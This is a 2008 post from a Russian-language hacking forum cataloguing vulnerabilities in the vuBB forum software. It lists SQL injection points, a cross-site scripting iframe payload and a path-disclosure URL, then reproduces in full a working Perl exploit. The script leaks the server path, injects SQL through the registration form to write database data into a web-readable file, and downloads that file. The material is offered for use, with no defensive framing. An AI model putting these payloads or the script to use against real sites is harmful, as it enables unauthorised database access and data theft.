Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

Уязвимости в vuBB

#11

20.01.2008, 14:54

~~iddqd~~

Banned

Регистрация: 19.12.2007

Сообщений: 924

Провел на форуме:
4192567

Репутация: 2145

Уязвимости в vuBB

Vendor: http://www.vubb.com/

vuBB alpha RC1

SQL Injection

Код:

http://host/forum/index.php?act=viewforum&f=[SQL] 
http://host/forum/index.php?act=viewtopic&t=[SQL] 
http://host/forum/index.php?act=usercp&view=[SQL]

Active XSS

В профиле пользователя содержимое многих полей не фильтруется. Атакующий может выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Passive XSS

Код:

http://www.example.com/forum/index.php?act=newreply&t='>%3CIFRAME%
20SRC=javascript:
alert(%2527XSS%2527)%3E%3C/IFRAME%3E&f=6

Path disclosure

Код:

http://www.example.com/forum/index.php?act=viewforum&f='

vuBB <=0.2

Remote SQL Injection (cookies)

http://milw0rm.com/id.php?id=1543

Index.PHP SQL Injection Vulnerability

http://www.securityfocus.com/vulnerabilities/exploits/vubb_sql_exploit.pl

vuBB <= 0.2.1

SQL Injection, XSS, CRLF Injection, Full Path Disclosure

Код:

#!/usr/bin/perl
#
# by DarkFig -- acid-root.new.fr
# French Advisory (vuBB <= 0.2.1 [BFA] SQL Injection, XSS, CRLF Injection, Full Path Disclosure): http://www.acid-root.new.fr/advisories/vubb021b.txt
#
use IO::Socket;
use LWP::Simple;


# Header
print "\r\n+---------------------------------------+", "\r\n";
print "|  vuBB <= 0.2.1 [BFA] SQL Injection   -|", "\r\n";
print "+---------------------------------------+", "\r\n";


# Usage
if(!$ARGV[2]){
  print "| Usage: <host> <path> <username> ------|", "\r\n";
  print "+---------------------------------------+", "\r\n";
exit;
}


# Host
if($ARGV[0] =~ /http:\/\/(.*)/){
  $host = $1;
} else {
  $host = $ARGV[0];
}
print "[+]Host: $host\r\n";


# Var
my $path = $ARGV[1];
my $user = $ARGV[2]; print "[+]User: $user\r\n";
my $port = 80;
my $fpd  = "http://".$host.$path."includes/vubb.php";
my $err1 = "[-]Can't connect to the host\r\n";
my $err2 = "[-]Can't retrieve the full path\r\n";
my $err3 = "[-]Can't retrieve the results\r\n";
my $poti = "POST "."$path"."index.php?act=register&action=register"." HTTP/1.1";


# Full Path Disclosure
$req0 = get($fpd) or die print $err1 and end();
if($req0 =~ /in <b>(.*)\/includes\/vubb.php<\/b>/) {
  $fullpath = $1."/thisismypasswd.txt";
  print "[+]Path: $1\r\n";
} else {
  print $err2 and end();
}


# Malicious data
my $pdat = "user=$user"."%27+INTO+OUTFILE+%27"."$fullpath"."%27%23"."&email=a669c4570f%40hotmail.com&vemail=a669c4570f%40hotmail.com&pass=mypassword&vpass=mypassword&agreement=iacceptohackit&agree=on";
my $ldat = length $pdat;
my $req1 = IO::Socket::INET->new(
                                 PeerAddr => $host,
                                 PeerPort => $port,
                                 Proto => "tcp"
                                    ) or print $err1 and end();
print $req1 "$poti", "\r\n";
print $req1 "Host: $host", "\r\n";
print $req1 "Content-Type: application/x-www-form-urlencoded", "\r\n";
print $req1 "Content-Length: $ldat", "\r\n\n";
print $req1 "$pdat", "\r\n";
close($req1);


# Results
$req2 = get("http://".$host.$path."/thisismypasswd.txt") or print $err3 and end();
open(f, ">VUBB_RESULT.txt");
print f $req2;
close(f);
print "[+]Done: VUBB_RESULT.txt\r\n";
end();


# Bye
sub end {
print "+---------------------------------------+", "\r\n";
exit;
}

Последний раз редактировалось iddqd; 24.01.2008 в 19:04..